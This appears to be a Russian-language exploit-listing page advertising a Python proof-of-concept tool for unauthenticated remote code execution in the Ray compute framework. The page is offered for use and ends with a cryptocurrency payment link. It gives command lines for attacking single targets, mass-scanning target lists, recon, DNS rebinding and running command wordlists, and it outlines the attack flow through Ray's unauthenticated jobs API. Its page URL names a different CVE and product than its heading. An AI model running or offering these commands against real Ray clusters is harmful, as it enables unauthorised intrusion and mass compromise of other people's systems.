## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MAXPROG-SVG-CVE-2026-33017
# CVE-2025-62593 — Эксплойт неаутентифицированного RCE в Ray
## Обзор
**CVE-2025-62593** — это уязвимость неаутентифицированного удалённого выполнения кода в распределённом AI-движке вычислений Ray. Корневая причина — отсутствие аутентификации на критических HTTP-эндпоинтах (`/api/jobs`, `/api/job_agent/jobs`). Злоумышленник может отправить Ray Job, чья точка входа представляет собой произвольную команду, и выполнить её на головном узле кластера.
## Быстрый старт
root@kitploit:~
# Одиночная цель
python3 ray_rce_poc.py --target http://HOST:8265
# Массовое сканирование (10 параллельных)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# Режим разведки (быстрая переборка)
python3 ray_rce_poc.py --recon --targets list.txt
# Режим DNS-реббинга
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# Сканирование по словарю
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
## Возможности
* **Асинхронность Asyncio** — настраиваемый параллелизм (по умолчанию: 10), сканирует 1000 целей за то же время, что и 1
* **Повторные попытки + экспоненциальная задержка** — 3 повтора на каждый запрос
* **Индикатор прогресса + ETA** — прогресс в реальном времени в ASCII
* **Цветной вывод** — ANSI-цвета (✓/✗/○)
* **3 формата вывода** — JSON / CSV / JSONL (автоопределение по расширению)
* **Режим разведки** — быстрая переборка без отправки заданий
* **Режим DNS-реббинга** — полная реализация RebindHTTPConnection
* **Режим словаря** — сканирование по списку команд
* **Только стандартная библиотека** — без внешних зависимостей, Python 3.8+
## Схема атаки
1. **Отправка задания** — POST `/api/jobs/` с точкой входа, выполняющей целевую команду
2. **Опрос статуса** — GET `/api/jobs/` до перехода задания в конечное состояние
3. **Получение логов** — GET `/api/jobs/{id}/logs` для восстановления вывода
https://satoshi-box.com/pay/CSIgNt